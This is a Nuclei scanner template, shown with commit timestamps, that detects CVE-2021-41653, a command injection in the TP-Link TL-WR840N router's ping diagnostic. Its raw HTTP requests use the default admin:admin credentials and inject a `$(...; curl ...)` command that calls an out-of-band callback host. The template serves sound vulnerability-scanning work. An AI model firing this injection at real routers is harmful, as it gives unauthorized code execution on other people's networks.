2021-11-30 05:35:25 +00:00
id : CVE-2021-41653
info :
name : TP-Link - OS Command Injection
author : gy741
severity : critical
2022-04-22 10:38:41 +00:00
description : The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
2023-09-06 12:09:01 +00:00
remediation : Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
2021-11-30 05:35:25 +00:00
reference :
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
2022-02-28 14:09:26 +00:00
- https://www.tp-link.com/us/press/security-advisory/
2023-04-12 10:55:48 +00:00
- http://tp-link.com
2024-06-07 10:04:29 +00:00
- https://github.com/ARPSyndicate/cvemon
2021-11-30 05:35:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-11-30 05:35:25 +00:00
cve-id : CVE-2021-41653
cwe-id : CWE-94
2024-06-07 10:04:29 +00:00
epss-score : 0.95198
epss-percentile : 0.99332
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : tp-link
product : tl-wr840n_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,tplink,rce,router,tp-link
2023-03-29 11:07:38 +00:00
variables :
2023-03-29 14:11:27 +00:00
useragent : '{{rand_base(6)}}'
2023-03-29 11:07:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-30 05:35:25 +00:00
- raw :
- |
POST /cgi?2 HTTP/1.1
Host : {{Hostname}}
Content-Type : text/plain
Referer : http://{{Hostname}}/mainFrame.htm
Cookie : Authorization=Basic YWRtaW46YWRtaW4=
[ IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
2023-03-29 13:54:19 +00:00
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
2021-11-30 05:35:25 +00:00
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
2021-11-30 16:52:16 +00:00
- |
2021-11-30 05:35:25 +00:00
POST /cgi?7 HTTP/1.1
Host : {{Hostname}}
Content-Type : text/plain
Referer : http://{{Hostname}}/mainFrame.htm
Cookie : Authorization=Basic YWRtaW46YWRtaW4=
[ ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
2023-03-29 10:03:28 +00:00
matchers-condition : and
2021-11-30 05:35:25 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-11-30 05:35:25 +00:00
words :
- "http"
2022-02-28 14:09:26 +00:00
2023-03-29 10:03:28 +00:00
- type : word
part : interactsh_request
words :
2023-03-29 13:54:19 +00:00
- "User-Agent: {{useragent}}"
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100e00b4f3419281e85535c8babdf14dc5d69ce61e005a4551ffbf780be9557836302206b3b7ff52372daf9901fba4165b2880c8c7f44bac8490570c772ec5e0e11d627:922c64590222798bb761d5b6d8e72950